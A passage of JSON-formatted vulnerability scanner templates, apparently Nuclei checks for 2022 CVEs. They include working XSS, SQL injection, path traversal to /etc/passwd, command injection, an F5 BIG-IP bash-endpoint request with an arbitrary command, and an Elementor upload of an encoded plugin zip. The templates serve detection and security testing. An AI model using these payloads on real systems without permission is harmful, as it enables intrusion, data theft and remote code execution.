Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=wp-gdpr-compliance&x=%27+onanimationstart%3Dalert%28document.domain%29+style%3Danimation-name%3Arotation+x  HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["x=\\' onanimationstart=alert(document.domain) style=animation-name:rotation x'","toplevel_page_wp-gdpr-compliance"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-36883","info":{"name":"Jenkins Git <=4.11.3 - Missing Authorization","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/git/notifyCommit?url={{randstr}}&branches={{randstr}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["repository:","SCM API plugin"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2290","info":{"name":"Trilium <0.52.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/custom/%3Cimg%20src=x%20onerror=alert(document.domain)%3E","{{BaseURL}}/share/api/notes/%3Cimg%20src=x%20onerror=alert(document.domain)%3E","{{BaseURL}}/share/api/images/%3Cimg%20src=x%20onerror=alert(document.domain)%3E/filename"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["No handler matched for custom <img src=x onerror=alert(document.domain)>","Note '<img src=x onerror=alert(document.domain)>' not found"],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2022-1815","info":{"name":"Drawio <18.1.2 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["GET /service/0/test.oast.me HTTP/2\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body, 'Interactsh Server')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2022-24899","info":{"name":"Contao <4.13.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/contao/%22%3e%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"></script><script>alert(document.domain)</script>","\"Not authenticated\""],"condition":"and"},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2022-24264","info":{"name":"Cuppa CMS v1.0 - SQL injection","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&password={{password}}&language=en&task=login\n","POST /components/table_manager/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nsearch_word=')+union+all+select+1,md5('{{num}}'),3,4,5,6,7,8--+-&order_by=id&order_orientation=ASC&path=component%2Ftable_manager%2Fview%2Fcu_countries&uniqueClass=wrapper_content_518284\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["{{md5(num)}}","td_available_languages"],"condition":"and"},{"type":"word","part":"header_2","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1439","info":{"name":"Microweber <1.2.15 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/module/?module=%27onm%3Ca%3Eouseover=alert(document.domain)%27%22tabindex=1&style=width:100%25;height:100%25;&id=x&data-show-ui=admin&class=x&from_url={{BaseURL}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<div class='x module module-'onmouseover=alert(document.domain) '","parent-module-id"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2185","info":{"name":"GitLab CE/EE - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/users/sign_in"],"redirects":true,"max-redirects":3,"matchers":[{"type":"word","words":["003236d7e2c5f1f035dc8b67026d7583ee198b568932acd8faeac18cec673dfa","1062bbba2e9b04e360569154a8df8705a75d9e17de1a3a9acd5bd20f000fec8b","1832611738f1e31dd00a8293bbf90fce9811b3eea5b21798a63890dbc51769c8","1ae98447c220181b7bd2dfe88018cb6e1b1e4d12d7b8c224d651a48ed2d95dfe","1d765038b21c5c76ff8492561c29984f3fa5c4b8cfb3a6c7b216ac8ab18b78c7","1d840f0c4634c8813d3056f26cbab7a685d544050360a611a9df0b42371f4d98","2ea7e9be931f24ebc2a67091b0f0ff95ba18e386f3d312545bb5caaac6c1a8be","301b60d2c71a595adfb65b22edee9023961c5190e1807f6db7c597675b0a61f0","383b8952f0627703ada7774dd42f3b901ea2e499fd556fce3ae0c6d604ad72b7","4f233d907f30a050ca7e40fbd91742d444d28e50691c51b742714df8181bf4e7","50d9206410f00bb00cc8f95865ab291c718e7a026e7fdc1fc9db0480586c4bc9","515dc29796a763b500d37ec0c765957a136c9e1f1972bb52c3d7edcf4b6b8bbe","57e83f1a3cf7c0fe3cf2357802306688dab60cf6a30d00e14e67826070db92de","5cd37ee959b5338b5fb48eafc6c7290ca1fa60e653292304102cc19a16cc25e4","5df2cb13ec314995ea43d698e888ddb240dbc7ccb6e635434dc8919eced3e25f","6a58066d1bde4b6e661fbd5bde83d2dd90615ab409b8c8c36e04954fbd923424","6eb5eaa5726150b8135a4fd09118cfd6b29f128586b7fa5019a04f1c740e9193","6fa9fec63ba24ec06fcae0ec30d1369619c2c3323fe9ddc4849af86457d59eef","739a920f5840de93f944ec86c5a181d0205f1d9e679a4df1b9bf5b0882ab848a","775f130d36e9eb14cb67c6a63551511b87f78944cebcf6cdddb78292030341df","7d0792b17e1d2ccac7c6820dda1b54020b294006d7867b7d78a05060220a0213","8b78708916f28aa9e54dacf9c9c08d720837ce78d8260c36c0f828612567d353","90abf7746df5cb82bca9949de6f512de7cb10bec97d3f5103299a9ce38d5b159","95ae8966ec1e6021f2553c7d275217fcfecd5a7f0b206151c5fb701beb7baf1e","a4333a9de660b9fc4d227403f57d46ec275d6a6349a6f5bda0c9557001f87e5d","a6d68fb0380bece011b0180b2926142630414c1d7a3e268fb461c51523b63778","a743f974bacea01ccc609dcb79247598bd2896f64377ce4a9f9d0333ab7b274e","a8bf3d1210afa873d9b9af583e944bdbf5ac7c8a63f6eccc3d6795802bd380d2","ba74062de4171df6109c4c96da1ebe2b538bb6cc7cd55867cbdfba44777700e1","c91127b2698c0a2ae0103be3accffe01995b8531bf1027ae4f0a8ad099e7a209","cfa6748598b5e507db0e53906a7639e2c197a53cb57da58b0a20ed087cc0b9d5","e539e07c389f60596c92b06467c735073788196fa51331255d66ff7afde5dfee","f8ba2470fbf1e30f2ce64d34705b8e6615ac964ea84163c8a6adaaf8a91f9eac","ff058b10a8dce9956247adba2e410a7f80010a236b2269fb53e0df5cd091e61d"],"condition":"or"}],"extractors":[{"type":"regex","group":1,"regex":["(?:application-)(\\S{64})(?:\\.css)"]}]}]},{"id":"CVE-2022-28117","info":{"name":"Navigate CMS 2.9.4 - Server-Side Request Forgery","severity":"medium"},"requests":[{"raw":["GET /navigate/login.php HTTP/1.1\nHost: {{Hostname}}\n","POST /navigate/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------123456789012345678901234567890\n\n-----------------------------123456789012345678901234567890\nContent-Disposition: form-data; name=\"login-username\"\n\n{{username}}\n-----------------------------123456789012345678901234567890\nContent-Disposition: form-data; name=\"csrf_token\"\n\n{{csrf_token}}\n-----------------------------123456789012345678901234567890\nContent-Disposition: form-data; name=\"login-password\"\n\n{{password}}\n-----------------------------123456789012345678901234567890\n","POST /navigate/navigate.php?fid=dashboard&act=json&oper=feed HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nlimit=5&language=en&url=file:///etc/passwd\n","GET /navigate/private/1/cache/0f1726ba83325848d47e216b29d5ab99.feed HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"csrf_token","group":1,"regex":["csrf_token\" value=\"([a-f0-9]{64})"],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-4325","info":{"name":"WordPress Post Status Notifier Lite <1.10.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/options-general.php?page=post-status-notifier-lite&controller=%3Cscript%3Ealert%28%60document.domain%60%29%3C%2Fscript%3E HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"<script>alert(`document.domain`)</script>\")","contains(body_2, \"Post Status Notifier Lite\")"],"condition":"and"}]}]},{"id":"CVE-2022-1007","info":{"name":"WordPress Advanced Booking Calendar <1.7.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=advanced-booking-calendar-show-seasons-calendars&setting=changeSaved&room=1111%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3C%22 HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(body_2, '<script>alert(document.domain)</script>')","contains(body_2, 'advanced-booking-calendar')","contains(header_2, 'text/html')","status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2022-2187","info":{"name":"WordPress Contact Form 7 Captcha <0.1.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/options-general.php?page=cf7sr_edit&\"></script><script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>","Contact Form 7"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0773","info":{"name":"Documentor <= 1.5.3 - Unauthenticated SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=doc_search_results&term=&docid=1+AND+(SELECT+6288+FROM+(SELECT(SLEEP(6)))HRaz)\n","GET /wp-content/plugins/documentor-lite/core/js/documentor.js HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["duration_1>=6","status_code == 200","contains(content_type_1, \"text/html\")","contains(body_1, \"([])\") && contains(body_2, \".documentor-help\")"],"condition":"and"}]}]},{"id":"CVE-2022-23178","info":{"name":"Crestron Device - Credentials Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/aj.html?a=devi"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"uname\":","\"upassword\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-29007","info":{"name":"Dairy Farm Shop Management System 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /dfsms/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername=admin' or '1'='1&password=1&login=login\n","GET /dfsms/add-category.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>Add Product</title>","<span>Admin","DFSMS"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-40022","info":{"name":"Symmetricom SyncServer Unauthenticated - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /controller/ping.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{RootURL}}/controller/ping.php\n\ncurrentTab=ping&refreshMode=&ethDirty=false&snmpCfgDirty=false&snmpTrapDirty=false&pingDirty=false&hostname=%60id%60&port=eth0&pingType=ping\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"regex","part":"body","regex":["uid=([0-9(a-z)]+)"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2022-43169","info":{"name":"Rukovoditel <= 3.2.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=users_groups/users_groups&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=&notes=&ldap_filter=\n"],"cookie-reuse":true,"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-33174","info":{"name":"Powertek Firmware <3.30.30 - Authorization Bypass","severity":"high"},"requests":[{"raw":["GET /cgi/get_param.cgi?xml&sys.passwd&sys.su.name HTTP/1.1\nHost: {{Hostname}}\nCookie: tmpToken=;\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["<sys.passwd>","<sys.su.name>"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":["<sys\\.passwd>([A-Z0-9a-z]+)<\\/sys\\.passwd>","<sys\\.su\\.name>([a-z]+)<\\/sys\\.su\\.name>"],"part":"body"}]}]},{"id":"CVE-2022-0747","info":{"name":"Infographic Maker iList < 4.3.8 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=qcld_upvote_action&post_id=1+AND+(SELECT+1626+FROM+(SELECT(SLEEP(6)))niPH)\n","GET /wp-content/plugins/infographic-and-list-builder-ilist/assets/js/ilist_custom_admin.js HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_1>=6","status_code_2 == 200","contains(content_type_2, \"text/javascript\")","contains(body_2, \"show_ilist_templates\")"],"condition":"and"}]}]},{"id":"CVE-2022-22733","info":{"name":"Apache ShardingSphere ElasticJob-UI privilege escalation","severity":"medium"},"requests":[{"raw":["POST /api/login HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/plain, */*\nAccess-Token:\nContent-Type: application/json;charset=UTF-8\nOrigin: {{RootURL}}\nReferer: {{RootURL}}\n\n{\"username\":\"guest\",\"password\":\"guest\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"success\":true","\"isGuest\":true","\"accessToken\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-32015","info":{"name":"Complete Online Job Search System 1.0 - SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?q=category&search=Banking%27%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,md5({{num}}),15,16,17,18,19--+"],"matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]}]}]},{"id":"CVE-2022-35405","info":{"name":"Zoho ManageEngine - Remote Code Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{RootURL}}/xmlrpc"],"body":"<?xml version=\"1.0\"?><methodCall><methodName>{{randstr}}</methodName><params><param><value>big0us</value></param></params></methodCall>\n","matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<name>faultString</name>"]},{"type":"word","part":"body","words":["No such service [{{randstr}}]","No such handler: {{randstr}}"],"condition":"or"},{"type":"word","part":"body","words":["<methodResponse>","</methodResponse>"],"condition":"or"}]}]},{"id":"CVE-2022-24384","info":{"name":"SmarterTools SmarterTrack - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /Main/Default.aspx?viewSurveyError=Unknown+survey\"><img%20src=x%20onerror=alert(document.domain)> HTTP/1.1\nHost: {{Hostname}}\n\n"],"matchers":[{"type":"word","words":["\"type\":\"error\",\"text\":\"Unknown survey\\\"><img src=x onerror=alert(document.domain)>\"","smartertrack"],"condition":"and"}]}]},{"id":"CVE-2022-47945","info":{"name":"Thinkphp Lang - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?lang=../../thinkphp/base","{{BaseURL}}/?lang=../../../../../vendor/topthink/think-trace/src/TraceDebug"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Call Stack","class=\"trace"],"condition":"and"},{"type":"status","status":[500]}]}]},{"id":"CVE-2022-1388","info":{"name":"F5 BIG-IP iControl - REST Auth Bypass RCE","severity":"critical"},"requests":[{"raw":["POST /mgmt/tm/util/bash HTTP/1.1\nHost: {{Hostname}}\nConnection: keep-alive, X-F5-Auth-Token\nX-F5-Auth-Token: a\nAuthorization: Basic {{base64(auth)}}\nContent-Type: application/json\n\n{\n     \"command\": \"run\",\n     \"utilCmdArgs\": \"-c '{{cmd}}'\"\n}\n","POST /mgmt/tm/util/bash HTTP/1.1\nHost: localhost\nConnection: keep-alive, X-F5-Auth-Token\nX-F5-Auth-Token: a\nAuthorization: Basic {{base64(auth)}}\nContent-Type: application/json\n\n{\n     \"command\": \"run\",\n     \"utilCmdArgs\": \"-c '{{cmd}}'\"\n}\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["commandResult","8831-2202-EVC"],"condition":"and"}]}]},{"id":"CVE-2022-34047","info":{"name":"WAVLINK WN530HG4 - Improper Access Control","severity":"high"},"requests":[{"raw":["GET /set_safety.shtml?r=52300 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["var syspasswd=\"","<title>APP</title>"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["syspasswd=\"(.+?)\""]}]}]},{"id":"CVE-2022-26564","info":{"name":"HotelDruid Hotel Management Software 3.0.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/creaprezzi.php?prezzoperiodo4=%22><script>javascript:alert(%27XSS%27)</script>","{{BaseURL}}/modifica_cliente.php?tipo_tabella=%22><script>javascript:alert(%27XSS%27)</script>&idclienti=1","{{BaseURL}}/dati/availability_tpl.php?num_app_tipo_richiesti1=%22><script>javascript:alert(%27XSS%27)</script>"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>javascript:alert('XSS')</script>","HotelDruid"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-29014","info":{"name":"Razer Sila Gaming Router 2.0.441_api-2.0.418 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /ubus/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n{\"jsonrpc\":\"2.0\",\"id\":3,\"method\":\"call\",\"params\":[\"4183f72884a98d7952d953dd9439a1d1\",\"file\",\"read\",{\"path\":\"/etc/passwd\"}]}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-22242","info":{"name":"Juniper Web Device Manager - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/error.php?SERVER_NAME=<script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","The requested resource is not authorized to view"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0281","info":{"name":"Microweber Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/users/search_authors"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"username\":","\"email\":","\"display_name\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-21500","info":{"name":"Oracle E-Business Suite <=12.2 - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/OA_HTML/ibeCAcpSSOReg.jsp"],"matchers-condition":"and","matchers":[{"type":"word","words":["Registration","Register as individual","<!-- ibeCZzpRuntimeIncl.jsp end -->"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31798","info":{"name":"Nortek Linear eMerge E3-Series - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/card_scan.php?No=0000&ReaderNo=0000&CardFormatNo=%3Cimg%20src%3Dx%20onerror%3Dalert%28document.domain%29%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[",\"CardFormatNo\":\"<img src=x onerror=alert(document.domain)>\"}"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31978","info":{"name":"Online Fire Reporting System v1.0 - SQL injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /classes/Master.php?f=delete_inquiry HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nid='+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"status\\\":\\\"success\")"],"condition":"and"}]}]},{"id":"CVE-2022-1916","info":{"name":"WordPress Active Products Tables for WooCommerce <1.0.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=woot_get_smth&what={%22call_action%22:%22x%22,%22more_data%22:%22\\u003cscript%3Ealert(document.domain)\\u003c/script%3E%22}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>"]},{"type":"word","part":"body","words":["woot-content-in-popup","woot-system","woot-table"],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31269","info":{"name":"Linear eMerge E3-Series - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/test.txt"],"matchers-condition":"and","matchers":[{"type":"word","words":["ID=","Password="],"condition":"and"},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["Password='(.+?)'"]}]}]},{"id":"CVE-2022-0827","info":{"name":"WordPress Best Books <=2.6.3 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout 10s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=bestbooks_add_transaction&type=x&account=x&date=x&description=1&debit=(CASE WHEN (9277=9277) THEN SLEEP(6) ELSE 9277 END)&credit=1\n"],"matchers":[{"type":"dsl","dsl":["duration_1>=6","status_code == 200","contains(body, \"Account added successfully\")"],"condition":"and"}]}]},{"id":"CVE-2022-4260","info":{"name":"WordPress WP-Ban <1.69.1 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET / HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin.php?page=wp-ban/ban-options.php HTTP/1.1\nHost: {{Hostname}}\n\n_wpnonce={{nonce}}&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dwp-ban%252Fban-options.php&banned_ips=&banned_ips_range=&banned_hosts=&banned_referers=XSS&banned_user_agents=&banned_exclude_ips=&banned_template_message=%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&Submit=Save+Changes\n","GET / HTTP/1.1\nHost: {{Hostname}}\nReferer: XSS\n"],"cookie-reuse":true,"req-condition":true,"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["contains(body_4, \"<script>alert(document.domain);</script>\")","contains(content_type_4, \"text/html\")","status_code_4 == 200"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["_wpnonce=([0-9a-z]+)"],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-1329","info":{"name":"Elementor Website Builder - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/ HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=336b29d7aee0463d8b651303eab505ea\n\n--336b29d7aee0463d8b651303eab505ea\nContent-Disposition: form-data; name=\"action\"\n\nelementor_upload_and_install_pro\n--336b29d7aee0463d8b651303eab505ea\nContent-Disposition: form-data; name=\"_nonce\"\n\n{{nonce}}\n--336b29d7aee0463d8b651303eab505ea\nContent-Disposition: form-data; name=\"fileToUpload\"; filename=\"{{randstr}}.zip\"\n\n{{base64_decode(\"UEsDBBQAAAAAAPEiZ1YAAAAAAAAAAAAAAAAOACAAZWxlbWVudG9yLXByby9VVA0AB8csB2TILAdkxywHZHV4CwABBOgDAAAE6AMAAFBLAwQUAAgACAB8KGdWAAAAAAAAAAA6BAAAHwAgAGVsZW1lbnRvci1wcm8vZWxlbWVudG9yLXByby5waHBVVA0ABzw2B2Q9NgdkPDYHZHV4CwABBOgDAAAE6AMAAKVSXU/bQBB8rn/FgqryoXyUoFZqKAUTnBCJhshxQKiq0Nlex6ee705354T8++45AfLQ9qVv9u3s7OzMfr3QpQ66x8cBHMNU1AsuYcIq7EMksELplIGpUb56jTYzXDuuZB+SEncQD5ha7hCuai5yNFAyC9wBE6IPuWELYDKnD6VBswVCuoG1QPNnFKDRFJg5yNHyhWxBpVIuEAxaraTlSwTMueNy0Wp4KmWwAyN0YB0zDnOQarW3o38ej/tQOqdtv9vFF5GdTFXdi9pVT1bVJsPzlW7rpsF+8K8ZqzSj+eebx3ZtePNe0fC68uic2dKPCWtXKrPjkKf2hXs0tnHntPO5c/IG/V9FrGH5uyI/KcFnB9eqYpzmv47YFi81y35556OdAlxmzOFCmTUMyNIt9C1UbqEwiGBV4VbM0EmsVQ0Zk5RMzq0zPK0pc5+zzLvUUKmcF2tPQm+19Ifg6EwcmsqCKpqf0WRO0Uk0TMC0TgXP4JZnKC0C3Yz2L7akSNOGx3cMvYbZVgMMFREzf4MtQE51A8uN63D6MmNL2ILNmkyuQdCmr8jOn1Z92ygHuiHPUypN6kvm/D4rLgSkCLXFohYt309geBgnN3fzBMLJIzyEcRxOksczAlNgVMUlbqh4pQUnZtrBMOnWJNUzfI/iwQ21hFfj23HySIJhOE4m0WwGw7sYQpiGcTIezG/DGKbzeHo3izowQ6/K5/UvN4smEHIsR8e4sH7pbhAEvIDDPW4tusP3T6Mo+XHAMseX5M/Bz6Oj4J1BVxt5FgSYlQqq/NPh/uA+avc+9nrtk9Pel/0jqgUX34LfUEsHCH5L6n9mAgAAOgQAAFBLAQIUAxQAAAAAAPEiZ1YAAAAAAAAAAAAAAAAOACAAAAAAAAAAAAD9QQAAAABlbGVtZW50b3ItcHJvL1VUDQAHxywHZMgsB2THLAdkdXgLAAEE6AMAAAToAwAAUEsBAhQDFAAIAAgAfChnVn5L6n9mAgAAOgQAAB8AIAAAAAAAAAAAALSBTAAAAGVsZW1lbnRvci1wcm8vZWxlbWVudG9yLXByby5waHBVVA0ABzw2B2Q9NgdkPDYHZHV4CwABBOgDAAAE6AMAAFBLBQYAAAAAAgACAMkAAAAfAwAAAAA=\")}}\n--336b29d7aee0463d8b651303eab505ea--\n","GET /index.php?activate=1 HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_4","words":["5f9bc5edd71c78284dabe630df8cd71d"]}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["admin-ajax.php\",\"nonce\":\"([0-9a-zA-Z]+)\"}"],"internal":true}]}]},{"id":"CVE-2022-41840","info":{"name":"Welcart eCommerce <=2.7.7 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/usc-e-shop/functions/progress-check.php?progressfile=../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2627","info":{"name":"WordPress Newspaper < 12 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php?td_theme_name=Newspaper&v=11.2 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: 